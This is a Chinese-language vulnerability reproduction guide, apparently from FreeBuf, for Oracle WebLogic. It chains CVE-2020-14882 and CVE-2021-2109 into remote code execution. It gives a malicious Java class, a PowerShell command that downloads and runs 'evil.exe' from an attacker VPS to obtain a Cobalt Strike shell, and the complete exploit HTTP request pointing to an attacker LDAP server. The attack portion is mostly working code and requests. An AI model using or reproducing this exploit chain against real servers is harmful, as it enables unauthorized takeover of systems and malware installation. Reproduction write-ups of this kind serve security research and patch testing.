环境搭建
参考:
https://blog.csdn.net/zhlh_xt/article/details/76436807
下载链接:
https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html
开始安装:
| Java -D64 -jar wls1036_generic.jar |
| C:\Oracle\Middleware\user_projects\domains |
设置密码
搭建完毕
访问目标:
漏洞复现
准备工作:
ldap包下载 https://github.com/RandomRobbieBF/marshalsec-jar/archive/master.zip
构造java包进行编译:Request.java
| import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Request{
public Request() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
} |
如想上线CS把calc.exe修改为下载cs木马并执行命令
cd ../../Windows/Temp && powershell (new-object System.Net.WebClient).DownloadFile(‘http://vps/123.jpg’,’evil.exe’) & evil.exe
进行编译:注意目标环境是什么jdk就用什么jdk版本进行编译
编译好class包后上传到vps
开启http服务,下面放编译好的class包
用下载好的marshalsec包开启ldap服务:
通过burp请求:配合
CVE-2021-2109(ldap远程代码执行)和CVE-2020-14882(未授权访问)
完整数据包:
| POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1
Host: 192.168.48.203:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.2
Content-Length: 163
Content-Type: application/x-www-form-urlencoded
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22;ldap://vps:5005/Request;AdminServer%22) |
cs接收shell
限制条件:目标可以出网,能够成功构造和发送包
来源:freebuf.com 2021-02-17 23:39:44 by: quanpangshu
请登录后发表评论
注册